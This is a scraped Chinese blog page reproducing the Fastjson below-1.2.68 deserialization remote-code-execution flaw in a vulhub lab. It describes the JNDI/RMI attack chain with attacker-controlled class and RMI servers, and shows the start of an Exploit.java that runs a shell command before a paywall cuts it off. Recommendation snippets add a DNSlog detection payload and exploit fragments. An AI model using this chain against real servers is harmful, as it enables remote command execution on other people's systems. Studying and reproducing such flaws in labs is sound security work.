红队武器库:fastjson小于1.2.68全漏洞RCE利用exp复现

最新推荐文章于 2025-02-07 16:42:33 发布
最新推荐文章于 2025-02-07 16:42:33 发布
阅读量5.9w 收藏 38
点赞数 6
分类专栏: WEB 漏洞复现和分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_zzZ/article/details/107122487
版权

0x01漏洞介绍

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

0x02影响范围

Fastjson < 1.2.68

Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有

0x03漏洞复现

下面以Fastjson 1.2.47 为例子,因为vulhub有现成的环境十分方便

P牛我用vulhub中的 1.2.47的docker   想测试doslog检查 fastjson 但是总是收到不到dnslog  但是正常的exp反弹shell就是可以我很疑惑    
我的用法正确吗,用的这个{"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"}

下面是流程示意图

image-20200704111745527

主机A:存在fastjson反序列化漏洞的主机
主机C:为RMI/LDAP服务
主机B:为构造的恶意类(包含要执行的命令)

在整个远程命令执行流程

1、黑客使用payload攻击主机A(该payload需要指定rmi/ldap地址)

2、主机A引发反序列化漏洞,发送了进行rmi远程发放调用,去连接主机C

3、主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi服务最终加载并执行主机B的恶意java类

4、主机A引发恶意系统命令执行

0x04复现流程

根据上图流程和环境复现:

主机A: http://1.1.1.1:8090 (存在Fastjson漏洞主机)
主机B: http://2.2.2.2:8888 (恶意java类服务)
主机C: rmi://2.2.2.2:9999 (远程方法调用服务)

实际上主机B和C是一台机器不同端口)

0x041 构造恶意方法

目标环境是openjdk:8u102,这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以简单利用RMI进行命令执行。

首先编译并上传命令执行代码

使用如下payload:

其中touch /zydx666为系统命令,可以根据自己需求随意修改

注意该文件名叫Exploit.java固定格式不能变

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
   
    public Exploit() throws Exception {
   
        Process p = Runtime.getRuntime().exec(new String[]{
   "bash", "-c", "touch /zydx666"}
最低0.47元/天 解锁文章
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5349
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
红队武器库-网络安人员必备
anquanzushiye的博客
02-20 5697
包含内容:侦察武器化投递命令与控制横向移动建立立足点提权数据传输杂项内容很不错,建议转发朋友圈作为存档。侦察主动情报收集EyeWitnessis designed to take sc...
最新版 fastjson-1.2.68.jar
04-16
最新版 fastjson-1.2.68.jar
RCE学习总结
最新发布
重庆森林不在重庆的博客
02-07 1639
为探讨清楚RCE的诸多细节,作者对学习过程进行了面、详细、系统的总结,形成了本文。
Fastjson小于1.2.68漏洞RCE利用exp
热门推荐
LiBai'S BLOG
03-01 1万+
json Exploit.java public class Exploit{ public Exploit() {} static { try { String[] cmds = System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"cmd.exe","/c", "calc.exe"} ..
Java代码审计——fastjson 1.2.68 反序列化漏洞 Mysql RCE
王嘟嘟的博客
03-21 6134
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 0x01 环境 首先是版本问题: fastjson 1.2.39-1.2.68 mysql 5.1.11- 8.x 默认Gadget maven <dependency> <groupId>mysql</groupId> <artifactId>mysql-con
Java代码审计——fastjson 1.2.68 反序列化漏洞 Exception
王嘟嘟的博客
03-14 9555
0x00 前言 反序列化总纲 继1.2.58绕过autotype之后,1.2.68又出现了新的绕过方式,通过Exception来进行绕过,但是此方法要求比较苛刻 0x01 环境搭建 首先来说版本,经过测试发现使用Exception的方法最低生效版本为1.2.40。所以maven调整到1.2.40即可。 这里我们需要假设有一个继承了Exception的类。 public class test extends Exception { private String domain; public
fastjson 1.2.68 反序列化远程代码执行漏洞
煜铭2011
06-01 1万+
0x00背景 fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安措施阻止漏洞攻击。 0x01影响范围 fastjson < 1.2.69 fastjson sec 版本 < sec10 0x02漏洞修复 1、升级至安...
工具红队武器库合集 - All-Defense-ToolL0una 
12-09
整个红队武器库合集中的工具构成了一个强大的网络攻防工具体系,覆盖了从信息收集、资产监控、漏洞发现到自动化扫描和渗透测试的各个环节。通过这些工具的组合使用,红队成员可以更加面地评估网络的安状况,为...
Window权限维持(一):注册表运行键.pdf
04-22
本文将深入探讨在Windows系统中,如何利用注册表中的“运行”键实现恶意软件的持久化,这是红队行动(即模拟攻击行为)中常用的一种技术手段。通过对注册表不同位置的修改,攻击者可以确保即使系统重启后,恶意软件...
fastjson <=1.2.68 远程代码执行漏洞 学习
西米安全
06-08 864
fastjson <=1.2.68 远程代码执行漏洞 学习1、 MAC 2、Java版本为 1.8.0_261 。 3、Mysql版本为 5.7 。我用的是PHPstudy集成的。 4、IDEA版本随意。创建一个spring 项目mavc pom.xml引用fastjson 创建demo_fastjson.java 输出 通过 前面已经说到如何去利用,所以这里需要寻找一个子类或实现非常多的类或接口都行,在实际中还是主要看checkAutoType方法中,有哪些对象或接口可以通过校验,实际测试中存在如下几种:
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/index.png) # Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/tmp.png) 2、编译Exploit.java javac
探秘Fastjson漏洞fastjson-bypass-autotype-1.2.68
gitblog_00025的博客
05-30 394
探秘Fastjson漏洞fastjson-bypass-autotype-1.2.68 去发现同类优质开源项目:https://gitcode.com/ 在Java世界里,Fastjson是一个广泛使用的JSON库,以其高效和便捷性赢得了开发者们的喜爱。然而,随着技术的发展,安问题日益凸显。本文将为您揭示一个关于Fastjson的安隐患——通过AutoCloseable和Throwabl...
Fastjson 1.2.68 bypass autotype
公众号shadow sock7
05-11 5023
参考: fastjson 1.2.68 最新版本有限制 autotype bypass 1.2.68加入了一个safeMode功能,默认未开启,需要用户手动开启。以下利用在默认未开启情况下可利用。 修复方法: ParserConfig.getGlobalInstance().setSafeMode(true); 依赖: <!-- test for fastjson 1.2.68 autotype bypass --> <dependency>
JsonExpfastjson漏洞批量检测工具,2024年最新持续更新大厂面试笔试题
2401_83974590的博客
04-17 896
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。若存在dnslog回弹结果,将会生成/result/xxx_dnslog.html文件,没触发dnslog则不会生成该文件。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完没有问题。
android fastjson漏洞_Fastjson <=1.2.68 远程代码执行漏洞
weixin_29300931的博客
12-28 547
漏洞名称:Fastjson <=1.2.68 远程代码执行漏洞威胁等级:高危影响范围:Fastjson<=1.2.68漏洞类型:代码执行 漏洞分析 1 Fastjson组件介绍Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fas...
漏洞复现Fastjson反序列化
网络安全知识分享
12-31 6003
Fastjson反序列化一、简介二、序列化与反序列化三、Fastjson漏洞介绍1漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1fastjson<=1.2.241.1、TemplatesImpl 利用分析1.2、JNDI利用分析1.3、JNDI利用1.4、官方进行的修复2fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
Fastjson
haha1314的博客
08-07 976
一、检测 1.2.67以下的fastjson {"@type":“java.net.Inet4Address”,“val”:“dnslog”} {"@type":“java.net.Inet6Address”,“val”:“dnslog”} 但是有的不成功。 二、利用 Docker搭建环境 2.1生成poc 下面文件为反弹shell,替换成这一句,dnslog检测。 String[] commands = {“ping”, “eqkkk1.dnslog.cn”}; 创建一个文件,TouchFile.jav
Fastjson反序列化漏洞复现小结
GhostdomY的博客
10-26 2415
fastjson漏洞复现
红队C代码库深入分析:ntdll.dll钩子技术揭秘
研究人员常常关注这个库,因为很多安相关的操作和漏洞利用都会涉及到这个库中的API函数。 6. hook_finder_64.exe工具的使用: 描述中提到了一个名为"hook_finder_64.exe"的工具,用于挂钩"ntdll.dll"。根据...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值